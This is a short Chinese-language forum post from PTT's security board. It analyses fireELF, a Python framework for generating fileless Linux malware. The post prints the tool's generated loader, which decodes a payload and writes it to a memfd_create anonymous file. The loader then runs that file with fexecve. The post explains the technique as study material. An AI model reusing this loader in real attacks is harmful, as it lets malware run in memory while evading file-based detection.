[閒聊] 2019-M02 - Fileless Malware Framework

看板NetSecurity (資安資訊安全)作者CMJ0121 (不要偷 Q)時間5年前 (2019/04/20 13:54)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/1

2019-M02 - Fileless Malware Framework 看文章的時候看到了一個 [project][0] 介紹 fileless 的惡意程式：他是用 python 寫的 linux-based 的無檔案惡意程式套件可以讓使用者簡單快速的產生、建立一個 fileless 惡意程式不得不說，這個 project 的 source code 可讀性非常差 (雖然用 Python 撰寫的) 在 main.py 開始有兩個部分：CLI 參數的處理、以及產生惡意程式的部分在透過一連串的操作之後最後會產生一個 Python 惡意檔案： #! /usr/bin/env python import ctypes, os, urllib2, base64 libc = ctypes.CDLL(None) argv = ctypes.pointer((ctypes.c_char_p * 0)(*[])) syscall = libc.syscall fexecve = libc.fexecve content = base64.b64decode("...") fd = syscall(319, "", 1) os.write(fd, content) fexecve(fd, argv, argv) 從產生的程式碼來看他的目的是透過：ctypes 來找到 [fexecve][1] 跟 [sys_memfd_create][2] 這兩個 syscall 來完成無檔案的惡意程式先透過 **memfd_create** 來產生一個暱名檔案 (anonymous file)、寫入惡意內容、最後透過 **fexecve** 執行。 [0]: https://github.com/rek7/fireELF/ [1]: https://linux.die.net/man/3/fexecve [2]: https://www.systutorials.com/docs/linux/man/2-memfd_create/ -- ※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 106.1.224.240 ※ 文章網址: https://www.ptt.cc/bbs/NetSecurity/M.1555739664.A.090.html